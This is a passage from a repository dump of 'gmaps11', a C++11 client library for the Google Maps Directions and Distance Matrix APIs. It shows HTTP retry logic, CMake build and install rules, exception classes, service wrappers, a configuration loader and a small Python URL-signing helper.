Check if there is an error message\n\tstd::string error_msg = json_body[\"error_message\"].string_value();\n\tif (!error_msg.empty()) {\n\t\tthrow googlemaps::exceptions::api_error(api_status, error_msg);\n\t} else {\n\t\tthrow googlemaps::exceptions::api_error(api_status);\n\t}\n}\n\ndouble Client::unirand() {\n\t// seed with the system clock\n\tsrand(time(0));\n\treturn rand() / double(RAND_MAX);\n}\n\nstd::string Client::parse_python_exception() {\n\t// Parses the value of the active python exception\n\t// NOTE SHOULD NOT BE CALLED IF NO EXCEPTION\n\tPyObject *type_ptr = NULL, *value_ptr = NULL, *traceback_ptr = NULL;\n\t// Fetch the exception info from the Python C API\n\tPyErr_Fetch(&type_ptr, &value_ptr, &traceback_ptr);\n\n\t// Fallback error\n\tstd::string ret(\"Unfetchable Python error\");\n\t// If the fetch got a type pointer, parse the type into the exception string\n\tif (type_ptr != NULL) {\n\t\tpy::handle<PyObject> h_type(type_ptr);\n\t\tpy::str type_pstr(h_type);\n\t\t// Extract the string from the boost::python object\n\t\tpy::extract<std::string> e_type_pstr(type_pstr);\n\t\t// If a valid string extraction is available, use it\n\t\t// otherwise use fallback\n\t\tif (e_type_pstr.check())\n\t\t\tret = e_type_pstr();\n\t\telse\n\t\t\tret = \"Unknown exception type\";\n\t}\n\t// Do the same for the exception value (the stringification of the exception)\n\tif (value_ptr != NULL) {\n\t\tpy::handle<PyObject> h_val(value_ptr);\n\t\tpy::str a(h_val);\n\t\tpy::extract<std::string> returned(a);\n\t\tif (returned.check())\n\t\t\tret += \": \" + returned();\n\t\telse\n\t\t\tret += std::string(\": Unparseable Python error: \");\n\t}\n\t// Parse lines from the traceback using the Python traceback module\n\tif (traceback_ptr != NULL) {\n\t\tpy::handle<PyObject> h_tb(traceback_ptr);\n\t\t// Load the traceback module and the format_tb function\n\t\tpy::object tb(py::import(\"traceback\"));\n\t\tpy::object fmt_tb(tb.attr(\"format_tb\"));\n\t\t// Call format_tb to get a list of traceback strings\n\t\tpy::object tb_list(fmt_tb(h_tb));\n\t\t// Join the traceback strings into a single string\n\t\tpy::object tb_str(py::str(\"\\n\").join(tb_list));\n\t\t// Extract the string, check the extraction, and fallback in necessary\n\t\tpy::extract<std::string> returned(tb_str);\n\t\tif (returned.check())\n\t\t\tret += \": \" + returned();\n\t\telse\n\t\t\tret += std::string(\": Unparseable Python traceback\");\n\t}\n\treturn ret;\n}\n\nstd::string Client::Get(std::string url, UrlParams params,\n\t\tbool accepts_clientid, boost::optional<Timestamp> first_request_time,\n\t\tint retry_counter, std::string base_url,\n\t\tstd::function<std::string(std::string)> extract_body) {\n\n\tif (!first_request_time) {\n\t\tfirst_request_time = system_clock::now();\n\t}\n\n\tduration<double> elapsed_time = system_clock::now() - first_request_time.get();\n\tif (elapsed_time.count() > retry_timeout_) {\n\t\tthrow googlemaps::exceptions::timeout_error();\n\t}\n\n\tif (retry_counter > 0) {\n\t\t// 0.5 * (1.5 ^ i) is an increased sleep time of 1.5x per iteration,\n\t\t// starting at 0.5s when retry_counter=0. The first retry will occur\n\t\t// at 1, so subtract that first.\n\t\tdouble delay_seconds = 0.5\n\t\t\t\t* std::pow(1.5, (double) (retry_counter - 1));\n\t\t// Jitter this value by 50% and pause\n\t\tstd::this_thread::sleep_for(\n\t\t\t\tseconds(\n\t\t\t\t\t\tboost::lexical_cast<int64_t>(\n\t\t\t\t\t\t\t\tdelay_seconds * (unirand() + 0.5))));\n\t}\n\n\tstd::string authed_url = generate_auth_url(url, params, accepts_clientid);\n\n\tstd::stringstream response_stream;\n\t// Create writer to handle the stream\n\tcurl::curl_writer owriter(response_stream);\n\t// Content will be written to writer\n\tcurl::curl_easy easy(owriter);\n\teasy.add(curl_pair<CURLoption, string>(CURLOPT_URL, authed_url));\n\teasy.add(curl_pair<CURLoption, long>(CURLOPT_FOLLOWLOCATION, 1L));\n\t// CURL timeout defaults to 0 -> which means never times out.\n\teasy.add(curl_pair<CURLoption, long>(CURLOPT_TIMEOUT, (timeout_ < 0) ? 0 : timeout_));\n\t// CURL connect timeout -> Set to 0 to switch to defaut built-in value (300 seconds)\n\teasy.add(curl_pair<CURLoption, long>(CURLOPT_CONNECTTIMEOUT, (connect_timeout_ < 0) ? 0 : connect_timeout_));\n\n\ttry {\n\t\t// Perform the GET request\n\t\teasy.perform();\n\t\t// Check if response code is in RETRIABLE_STATUSES\n\t\tauto reqhttpCode = easy.get_info<long>(CURLINFO_RESPONSE_CODE);\n\t\tif (in<long>(*reqhttpCode, RETRIABLE_STATUSES)) {\n\t\t\t// Retry request\n\t\t\treturn this->Get(url, params, accepts_clientid, first_request_time, retry_counter + 1,\n\t\t\t\t\tbase_url, extract_body);\n\t\t}\n\n\t\t// Extract the body of the response\n\t\tif (extract_body != nullptr) {\n\t\t\treturn extract_body(response_stream.str());\n\t\t}\n\t\treturn get_body(response_stream.str());\n\t}\n\tcatch (googlemaps::exceptions::retriable_request_error & err) {\n\t\treturn this->Get(url, params, accepts_clientid, first_request_time, retry_counter + 1,\n\t\t\t\tbase_url, extract_body);\n\t}\n\tcatch(googlemaps::exceptions::base_error& err) {\n\t\t// Catch other errors and log them for now\n\t\tstd::cerr << err.__str__() << std::endl;\n\t}\n\tcatch (curl_easy_exception & error) {\n\t\terror.print_traceback();\n\t}\n\treturn std::string(\"\");\n}\n"
},
{
"alpha_fraction": 0.5735668540000916,
"alphanum_fraction": 0.5856688022613525,
"avg_line_length": 30.089109420776367,
"blob_id": "6a76b9062a9e581bf97c01572b9298d094e8ff7c",
"content_id": "0d1825e8233e43e583571f544bd140498204d6ea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3140,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 101,
"path": "/CMakeLists.txt",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.4)\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} \"${CMAKE_SOURCE_DIR}/cmake/Modules/\")\n\nset(PROJECT_NAME \"Google Maps API client for C++11\")\nproject(${PROJECT_NAME})\n\nset(CMAKE_CXX_FLAGS \"-std=c++11 -Wall\")\n\n##############################################\n# BOOST LIB #\n##############################################\nset (Boost_USE_MULTITHREADED ON)\nset (BOOST_ALL_DYN_LINK ON)\n\nfind_package(Boost 1.54.0 REQUIRED COMPONENTS system python filesystem)\nif (Boost_FOUND)\n\tinclude_directories(SYSTEM ${Boost_INCLUDE_DIRS})\n\tlink_directories(SYSTEM ${Boost_LIBRARY_DIRS})\nelse()\n\tmessage (FATAL_ERROR \"Need Boost library 1.54.0+ to continue build.\")\n\treturn()\nendif()\n\n##############################################\n# PYTHON LIBS #\n##############################################\nfind_package (PythonLibs REQUIRED)\nif (PYTHONLIBS_FOUND)\n\tinclude_directories(SYSTEM ${PYTHON_INCLUDE_DIRS})\nelse()\n\tmessage (FATAL_ERROR \"Need Python libs to continue build\")\n\treturn()\nendif()\n\n#############################################\n# CURL LIB #\n#############################################\nfind_package (CURL REQUIRED)\nif (CURL_FOUND)\n\tinclude_directories (${CURL_INCLUDE_DIRS})\n\tlink_directories(${CURL_LIBRARIES})\nelse()\n\tmessage (FATAL_ERROR \"Could not found curl library\")\n\treturn ()\nendif()\n\n#############################################\n# CURLCPP LIB #\n#############################################\nfind_package (Curlcpp REQUIRED)\nif (Curlcpp_FOUND)\n\tinclude_directories (${Curlcpp_INCLUDE_DIRS})\n\tlink_directories (${Curlcpp_LIBRARIES})\nelse()\n\tmessage (FATAL_ERROR \"Could not find curlcpp library\")\n\treturn ()\nendif()\n\n\nset (INCLUDE_DIRS include/gmaps11)\nset (SOURCES src/configuration.cc src/directions.cc src/distancematrix.cc\n\t\t\t\t\t\t src/http_client.cc src/json11.cc)\n\ninclude_directories(${INCLUDE_DIRS})\nadd_library (gmaps11_dyn SHARED ${SOURCES})\n\nset_target_properties (gmaps11_dyn PROPERTIES OUTPUT_NAME \"gmaps11\")\nset_target_properties (gmaps11_dyn PROPERTIES VERSION 1.0 SOVERSION 1)\n\ntarget_link_libraries(gmaps11_dyn ${Boost_LIBRARIES} ${PYTHON_LIBRARIES} ${Curlcpp_LIBRARIES} ${CURL_LIBRARIES})\n\n\n############################################\n# INSTALL \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #\n############################################\n# Install the static library\ninstall (TARGETS gmaps11_dyn\n\t\t\t\t LIBRARY DESTINATION lib\n\t\t\t\t)\n# Install the headers\ninstall (\tDIRECTORY include/gmaps11\n\t\t\t\t\tDESTINATION include\n\t\t\t\t)\n\n# Install PyCrypto module\nfind_program(EASY_INSTALL \"easy_install\")\nif (EASY_INSTALL)\n\tset(EASY_INSTALL_OPTS \"-d\")\n\tset(PY_INSTALL_DEST \"/usr/lib/python2.7/dist-packages\")\n\tset(PY_CRYPTO \"${CMAKE_CURRENT_SOURCE_DIR}/PyCrypto\")\n\tset(INSTALL_COMMAND \"${EASY_INSTALL}\"\n\t\t\t\t\t\t\t\t\t\t\t\"${EASY_INSTALL_OPTS}\"\n\t\t\t\t\t\t\t\t\t\t\t\"${PY_INSTALL_DEST}\"\n\t\t\t\t\t\t\t\t\t\t\t\"${PY_CRYPTO}\")\n\tstring(REPLACE \";\" \" \" INSTALL_COMMAND \"${INSTALL_COMMAND}\")\n install(CODE \"execute_process(COMMAND ${INSTALL_COMMAND})\")\nelse()\n\tmessage (FATAL_ERROR \"Please make sure 'easy_install' is installed\")\n\treturn()\nendif()\n"
},
{
"alpha_fraction": 0.7032257914543152,
"alphanum_fraction": 0.7046595215797424,
"avg_line_length": 26.352941513061523,
"blob_id": "5f3e8aea7903a7e10831aafedb3cc5225596027d",
"content_id": "6390d3b011e3124593b7e9411597d844741df321",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1395,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 51,
"path": "/include/gmaps11/directions.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * directions_service.hpp:\n * \t\tWrapper to perform requests to Google Maps Directions API.\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef DIRECTIONS_HPP_\n#define DIRECTIONS_HPP_\n\n#include <vector>\n#include <stdexcept>\n#include <boost/optional.hpp>\n#include <boost/scoped_ptr.hpp>\n#include <boost/assign/list_of.hpp>\n\n#include \"http/http_client.hpp\"\n#include \"utility/convert.hpp\"\n#include \"utility/meta.hpp\"\n#include \"config/configuration.hpp\"\n\nnamespace googlemaps {\n\nstatic const std::vector<std::string> & DIRECTIONS_MODES =\n\t\tboost::assign::list_of(\"driving\")(\"walking\")(\"bicycling\")(\"transit\");\n\nclass DirectionsService {\n\ttypedef boost::optional<std::vector<waypoint_t>> Waypoints_t;\npublic:\n\tDirectionsService();\n\t// You can't specify both departure_time and arrival_time\n\tstd::string query(waypoint_t origin, waypoint_t destination,\n\t\t\tstd::string mode = \"\", Waypoints_t waypoints = boost::none,\n\t\t\tbool alternatives = false, std::string avoid = \"\",\n\t\t\tstd::string language = \"\", std::string units = \"\",\n\t\t\tstd::string region = \"\", int departure_time = -1,\n\t\t\tint arrival_time = -1, bool optimize_waypoints = false,\n\t\t\tstd::string transit_mode = \"\",\n\t\t\tstd::string transit_routing_preference = \"\");\n\nprivate:\n\tstd::string convert_waypoint(waypoint_t waypoint);\n\nprivate:\n\tboost::scoped_ptr<http::Client> gm_Client;\n};\n\n} /* NAMEPSPACE googlemaps */\n\n#endif /* DIRECTIONS_HPP_ */\n"
},
{
"alpha_fraction": 0.6045751571655273,
"alphanum_fraction": 0.6094771027565002,
"avg_line_length": 16,
"blob_id": "100a5bcef722985ba32acbb97885b09129e111e5",
"content_id": "b7253988a2489d8a34bfda9c8435166331e6f24e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 612,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 36,
"path": "/include/gmaps11/utility/meta.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * meta.hpp:\n * \t\tSome meta-stuff!\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef UTILITY_META_HPP_\n#define UTILITY_META_HPP_\n\n#include <vector>\n#include <algorithm> // std::find\n\n\nnamespace meta {\n\n// template metaclass that allows to check\n// if value of type T is inside an std::vector<T>\n// e.g: meta::in<long>(200l, Container);\ntemplate<typename T>\nclass in {\n\tT value_;\n\tconst std::vector<T> & C_;\npublic:\n\tin(T value, const std::vector<T> & C) :\n\t\t\tvalue_(value), C_(C) {\n\t}\n\toperator bool() {\n\t\treturn std::find(C_.begin(), C_.end(), value_) != C_.end();\n\t}\n};\n\n}\n\n#endif /* UTILITY_META_HPP_ */\n"
},
{
"alpha_fraction": 0.6701414585113525,
"alphanum_fraction": 0.6708860993385315,
"avg_line_length": 18.75,
"blob_id": "b98a4dad06d1630618e59df14c44da487c1d6a16",
"content_id": "c85208f8074ea54e54775e94c3301dac05d9060b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1343,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 68,
"path": "/include/gmaps11/except/exceptions.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * exceptions.hpp:\n * \t Defines exceptions that are thrown by the Google Maps client.\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef EXCEPT_EXCEPTIONS_HPP_\n#define EXCEPT_EXCEPTIONS_HPP_\n\n#include <string>\n#include <boost/format.hpp>\n\nnamespace googlemaps {\nnamespace exceptions {\n\n// Something went wrong while trying to execute a request\nclass base_error {\npublic:\n\tvirtual ~base_error() = default;\n\tvirtual std::string __str__() = 0;\n};\n\n// Represents an error returned by the remote API\nclass api_error: public base_error {\n\tstd::string status_;\n\tstd::string message_;\npublic:\n\tapi_error(std::string status, std::string message = \"\") :\n\t\t\tstatus_(status), message_(message) {\n\t}\n\tvirtual std::string __str__() override {\n\t\treturn boost::str(boost::format(\"%s (%s)\") % status_ % message_);\n\t}\n\t~api_error() = default;\n};\n\n// An unexpected HTTP error occurred\nclass http_error: public base_error {\n\tint status_code_;\npublic:\n\thttp_error(int status_code) :\n\t\t\tstatus_code_(status_code) {\n\t}\n\n\tvirtual std::string __str__() override {\n\t\treturn boost::str(boost::format(\"HTTP Error: %d\") % status_code_);\n\t}\n\t~http_error() = default;\n};\n\n// The request timed out\nclass timeout_error {\n\t// pass\n\t;\n};\n\n// Signifies that the request can be retried\nclass retriable_request_error {\n\t// pass\n\t;\n};\n}\n\n}\n\n#endif /* EXCEPT_EXCEPTIONS_HPP_ */\n"
},
{
"alpha_fraction": 0.7906976938247681,
"alphanum_fraction": 0.7906976938247681,
"avg_line_length": 27.66666603088379,
"blob_id": "c1372c851ee88f02620b590ab5a30e8846fe05a5",
"content_id": "a569e611a18aed7ee063c7441e6f7ead37d7bae6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 86,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 3,
"path": "/src/configuration.cc",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "#include \"config/configuration.hpp\"\n\nConfigLoader * ConfigLoader::instance = nullptr;\n"
},
{
"alpha_fraction": 0.6753042936325073,
"alphanum_fraction": 0.6768747568130493,
"avg_line_length": 27.94318199157715,
"blob_id": "79ab4989fe385073e2b97208a98410178cf99dd2",
"content_id": "836c95fc783bbea1b8e2b1d232bea28e51d9f4be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2547,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 88,
"path": "/src/directions.cc",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "#include \"directions.hpp\"\n\nusing namespace googlemaps;\n\nDirectionsService::DirectionsService() {\n\t //*NOTE* reset() is the only way to initialize a scoped_ptr inside Ctor\n\tgm_Client.reset(new http::Client(\n\t\t\tConfigLoader::Instance()->Get<API_KEY>(),\n\t\t\tConfigLoader::Instance()->Get<CLIENT_ID>(),\n\t\t\tConfigLoader::Instance()->Get<CLIENT_SECRET>()\n\t\t));\n}\n\nstd::string DirectionsService::convert_waypoint(waypoint_t waypoint) {\n\treturn convert::as_string(waypoint);\n}\n\nstd::string DirectionsService::query(waypoint_t origin, waypoint_t destination,\n\t\tstd::string mode, Waypoints_t waypoints, bool alternatives,\n\t\tstd::string avoid, std::string language, std::string units,\n\t\tstd::string region, int departure_time, int arrival_time,\n\t\tbool optimize_waypoints, std::string transit_mode,\n\t\tstd::string transit_routing_preference)\n{\n\thttp::UrlParams params = {\n\t\t\t{ \"origin\", convert_waypoint(origin) },\n\t\t\t{ \"destination\", convert_waypoint(destination) }\n\t};\n\n\tif (!mode.empty()) {\n\t\t// *NOTE* The mode parameter is not validated by the Maps API\n\t\t// server. Check here to prevent silent failures.\n\t\tif ( meta::in<std::string>(mode, DIRECTIONS_MODES) ) {\n\t\t\tparams[\"mode\"] = mode;\n\t\t} else {\n\t\t\tthrow std::domain_error(\"Invalid travel mode.\");\n\t\t}\n\t}\n\n\tif (waypoints) {\n\t\tstd::vector<std::string> _waypoints_ = convert::transform_list(\n\t\t\t\t*waypoints);\n\t\tif (optimize_waypoints) {\n\t\t\t_waypoints_.insert(_waypoints_.begin(), \"optimize:true\");\n\t\t}\n\t\tparams[\"waypoints\"] = boost::algorithm::join(_waypoints_, \"|\");\n\t}\n\n\tif (alternatives) {\n\t\tparams[\"alternatives\"] = \"true\";\n\t}\n\n\t// If multiple use '|' as a separtor\n\tif (!avoid.empty()) {\n\t\tparams[\"avoid\"] = avoid;\n\t}\n\n\tif (departure_time > 0) {\n\t\tparams[\"departure_time\"] = departure_time;\n\t}\n\n\tif (arrival_time > 0) {\n\t\tparams[\"arrival_time\"] = arrival_time;\n\t}\n\n\tif (departure_time > 0 && arrival_time > 0) {\n\t\tthrow std::domain_error(\"Should not specify both departure_time and arrival_time.\");\n\t}\n\n\tif (!language.empty()) \tparams[\"language\"] = language;\n\tif (!units.empty()) \tparams[\"units\"] = units;\n\tif (!region.empty()) \tparams[\"region\"] = region;\n\n\t// If multiple use '|' as a separtor\n\tif (!transit_mode.empty()) {\n\t\tparams[\"transit_mode\"] = transit_mode;\n\t}\n\n\tif (!transit_routing_preference.empty()) {\n\t\tparams[\"transit_routing_preference\"] = transit_routing_preference;\n\t}\n\n\t// accepts_clientid parameter defaults to false\n\tbool _use_client_id = ConfigLoader::Instance()->Get<USE_CLIENT_ID>() == \"true\";\n\n\treturn gm_Client->Get(\"/maps/api/directions/json\", params,\n\t\t\t_use_client_id);\n}\n"
},
{
"alpha_fraction": 0.6791808605194092,
"alphanum_fraction": 0.6928327679634094,
"avg_line_length": 21.538461685180664,
"blob_id": "21db8acbb506d53a5ed0b9674e4932067fd4ee33",
"content_id": "2bf7a200cf34d72fc1e5ec4e4e0ffeb11e12dfac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 13,
"path": "/PyCrypto/setup.py",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nsetup(\n\tname='Crypto',\n version='1.0',\n description='Set of crypto functions and operations for Google Maps APIs',\n author='Faissal Elamraoui',\n author_email='[email protected]',\n url='https://github.com/amrfaissal/gmaps11',\n py_modules=['crypto'],\n)\n"
},
{
"alpha_fraction": 0.6979714632034302,
"alphanum_fraction": 0.6994740962982178,
"avg_line_length": 24.596153259277344,
"blob_id": "39063ad20f036a11bcd6fba0dd043725c7d8ba76",
"content_id": "697b998b7360b3e8153f6e0980aeaf28bc189d42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1331,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 52,
"path": "/include/gmaps11/distancematrix.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * distancematrix_service.h:\n * \t\tWrapper to perform requests to the Google Maps Distance Matrix API.\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef DISTANCEMATRIX_HPP_\n#define DISTANCEMATRIX_HPP_\n\n#include <boost/scoped_ptr.hpp>\n#include <boost/assign/list_of.hpp>\n#include <boost/variant.hpp>\n#include <vector>\n#include <string>\n#include <algorithm>\n#include <stdexcept>\n\n#include \"http/http_client.hpp\"\n#include \"utility/convert.hpp\"\n#include \"utility/meta.hpp\"\n#include \"config/configuration.hpp\"\n\n\nnamespace googlemaps {\n\nstatic const std::vector<std::string> & dm_Modes = boost::assign::list_of(\n\t\t\"driving\")(\"walking\")(\"bicycling\")(\"transit\");\nstatic const std::vector<std::string> & avoid_Types = boost::assign::list_of(\n\t\t\"tolls\")(\"highways\")(\"ferries\");\n\nclass DistanceMatrixService {\npublic:\n\tDistanceMatrixService();\n\tstd::string query(std::vector<waypoint_t> origins,\n\t\t\tstd::vector<waypoint_t> destinations, std::string mode = \"\",\n\t\t\tstd::string language = \"\", std::string avoid = \"\",\n\t\t\tstd::string units = \"\", int departure_time = -1,\n\t\t\tint arrival_time = -1, std::string transit_mode = \"\",\n\t\t\tstd::string transit_routing_preference = \"\");\n\nprivate:\n\tstd::string convert_path(std::vector<waypoint_t> waypoints);\n\nprivate:\n\tboost::scoped_ptr<http::Client> gm_Client;\n};\n\n}\n\n#endif /* DISTANCEMATRIX_HPP_ */\n"
},
{
"alpha_fraction": 0.6743970513343811,
"alphanum_fraction": 0.6762523055076599,
"avg_line_length": 27.36842155456543,
"blob_id": "d531648d2f25b65bb1b02db78599e21dcc513638",
"content_id": "c2367a0978395478731b0d37d9b731684d1c8c81",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2156,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 76,
"path": "/src/distancematrix.cc",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "#include \"distancematrix.hpp\"\n\nusing namespace googlemaps;\n\nDistanceMatrixService::DistanceMatrixService() {\n\tgm_Client.reset(new http::Client(\n\t\t\tConfigLoader::Instance()->Get<API_KEY>(),\n\t\t\tConfigLoader::Instance()->Get<CLIENT_ID>(),\n\t\t\tConfigLoader::Instance()->Get<CLIENT_SECRET>()\n\t\t\t));\n}\n\nstd::string DistanceMatrixService::convert_path(std::vector<waypoint_t> waypoints) {\n\treturn convert::join_list(\"|\", waypoints);\n}\n\nstd::string DistanceMatrixService::query(std::vector<waypoint_t> origins,\n\t\tstd::vector<waypoint_t> destinations, std::string mode,\n\t\tstd::string language, std::string avoid, std::string units,\n\t\tint departure_time, int arrival_time, std::string transit_mode,\n\t\tstd::string transit_routing_preference)\n{\n\thttp::UrlParams params = {\n\t\t\t{ \"origins\", convert_path(origins) },\n\t\t\t{ \"destinations\", convert_path(destinations) }\n\t};\n\n\tif (!mode.empty()) {\n\t\t// *NOTE* The mode parameter is not validated by the Maps API\n\t\t// server. Check here to prevent silent failures.\n\t\tif ( meta::in<std::string>(mode, dm_Modes) ) {\n\t\t\tparams[\"mode\"] = mode;\n\t\t} else {\n\t\t\tthrow std::domain_error(\"Invalid travel mode.\");\n\t\t}\n\t}\n\n\tif (!language.empty()) params[\"language\"] = language;\n\n\tif (!avoid.empty()) {\n\t\tif ( meta::in<std::string>(avoid, avoid_Types) ) {\n\t\t\tparams[\"avoid\"] = avoid;\n\t\t} else {\n\t\t\tthrow std::domain_error(\"Invalid route restriction.\");\n\t\t}\n\t}\n\n\tif (!units.empty()) params[\"units\"] = units;\n\n\tif (departure_time > 0) {\n\t\tparams[\"departure_time\"] = departure_time;\n\t}\n\n\tif (arrival_time > 0) {\n\t\tparams[\"arrival_time\"] = arrival_time;\n\t}\n\n\tif (departure_time > 0 && arrival_time > 0) {\n\t\tthrow std::domain_error(\"Should not specify both departure_time and arrival_time.\");\n\t}\n\n\t// If multiple use '|' as a separator\n\tif (!transit_mode.empty()) {\n\t\tparams[\"transit_mode\"] = transit_mode;\n\t}\n\n\tif (!transit_routing_preference.empty()) {\n\t\tparams[\"transit_routing_preference\"] = transit_routing_preference;\n\t}\n\n\t// accepts_clientid parameter defaults to false\n\tbool _use_client_id = ConfigLoader::Instance()->Get<USE_CLIENT_ID>() == \"true\";\n\n\treturn gm_Client->Get(\"/maps/api/distancematrix/json\", params,\n\t\t\t_use_client_id);\n}\n"
},
{
"alpha_fraction": 0.6628748774528503,
"alphanum_fraction": 0.68459153175354,
"avg_line_length": 30.19354820251465,
"blob_id": "8ab68dfc30b106ffb8a4a8d2455021415e974ef9",
"content_id": "7dfe373b454ee5f984d781dd9befcb0ff6f2c19d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 967,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 31,
"path": "/PyCrypto/crypto.py",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "\"\"\" Crypto.py:\n Set of crypto functions and operations for Google Maps APIs\n\"\"\"\n__author__ = \"Faissal Elamraoui\"\n__copyright__ = \"Copyright 2015, [email protected]\"\n__license__ = \"The MIT Licence\"\n__version__ = \"1.0\"\n__maintainer__ = \"Faissal Elamraoui\"\n__email__ = \"[email protected]\"\n__status__ = \"Production\"\n\nimport base64\nimport hashlib\nimport hmac\n\n\"\"\" Signs the path+query part of the URL using the provided private key.\n :param urlToSign: the path+query part of the URL\n :param privateKey: the base64 encoded binary secret\n :return string: base64 encoded signature\n\"\"\"\ndef url_signer(urlToSign, privateKey):\n signature = hmac.new(base64.urlsafe_b64decode(privateKey), urlToSign, hashlib.sha1)\n return base64.urlsafe_b64encode(signature.digest())\n\n\"\"\" URL encodes the parameters.\n :param params: The parameters\n :type string: URL encoded parameters\n\"\"\"\ndef urlencode_params(params):\n params = sorted(params.items())\n return \"&\".join(\"%s=%s\" % (k,v) for k,v in params)\n"
},
{
"alpha_fraction": 0.6497290134429932,
"alphanum_fraction": 0.652890682220459,
"avg_line_length": 28.13157844543457,
"blob_id": "4f3039719f6ffbb54156a547c3b9230bfd8597a2",
"content_id": "78f32a4c963ae8ecb8c97127551097e44d575b8e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4428,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 152,
"path": "/include/gmaps11/config/configuration.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/**\n * Configuration.hpp:\n * \t\tWrapper to load app-specific global configuration\n *\n * \t\tAuthor: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef _CONFIG_CONFIGURATION_HPP_\n#define _CONFIG_CONFIGURATION_HPP_\n\n#include <iostream>\n#include <string>\n#include <sstream>\n#include <ostream>\n#include <map>\n#include <stdexcept>\n#include \"../json/json11.hpp\"\n// Boost\n#include <boost/variant.hpp>\n#include <boost/filesystem.hpp>\n#include <boost/iostreams/device/file.hpp>\n#include <boost/iostreams/stream.hpp>\n\ntypedef enum {\n\t// GMaps API\n\tAPI_KEY,\n\tUSE_CLIENT_ID,\n\tCLIENT_ID,\n\tCLIENT_SECRET,\n\tMODE,\n\tLANG,\n\t// MySQL\n\tMYSQL_DB_NAME,\n\tMYSQL_HOST,\n\tMYSQL_USER,\n\tMYSQL_PWD,\n\t// Query limits\n\tSTART,\n\tCOUNT,\n\tQPS,\n\tCADENCE,\n\tDISTANCE_LIMIT,\n\tOUTPUT_FILE\n} Setting;\n\n\nclass ConfigLoader {\npublic:\n\t// Gets a setting value (string) from configuration map\n\t// e.g: ConfigLoader::Instance()->Get<API_KEY>();\n\ttemplate<Setting S> std::string Get() {\n\t\treturn __settings__[S];\n\t}\n\n\tstatic ConfigLoader * const Instance() {\n\t\tif (instance == nullptr) {\n\t\t\tinstance = new ConfigLoader();\n\t\t}\n\t\treturn instance;\n\t}\n\n\t// string representation of the current configuration\n\tstd::string __str__() {\n\t\treturn __cfgstr__;\n\t}\n\n\t// print the current load configuration to ostream\n\t// *NOTE* For DEBUG usage only\n\tvoid print_settings(std::ostream & os) {\n\t\tfor (auto & kv: __settings__) {\n\t\t\tos << kv.first << \" - \" << kv.second << '\\n';\n\t\t}\n\t}\n\nprivate:\n\t /* Load all settings in the Ctor */\n\tConfigLoader() {\n\t\tboost::filesystem::path configFile(\"gmaps11.config\");\n\t\tstd::string configPath;\n\t\ttry {\n\t\t\t// Check if the configuration file exists\n\t\t\tif (!boost::filesystem::exists(configFile)) {\n\t\t\t\tstd::cerr << \"Unable to find configuration file: \"\n\t\t\t\t\t\t\t\t\t<< boost::filesystem::absolute(configFile).native()\n\t\t\t\t\t\t\t\t\t<< std::endl;\n\t\t\t}\n\n\t\t\t// Get configuration file absolute path\n\t\t\tconfigPath = boost::filesystem::absolute(configFile).native();\n\t\t} catch (const boost::filesystem::filesystem_error& e) {\n\t\t\tstd::cerr << e.what() << std::endl;\n\t\t}\n\n\t\t// load and read the configuration file\n\t\tnamespace io = boost::iostreams;\n\t\tio::file_source configSource { configPath.c_str() };\n\t\tif ( configSource.is_open() )\n\t\t{\n\t\t\tio::stream<io::file_source> is{configSource};\n\t\t\tstd::stringstream buffer;\n\t\t\tbuffer << is.rdbuf();\n\n\t\t\t// parse the JSON formatted configuration 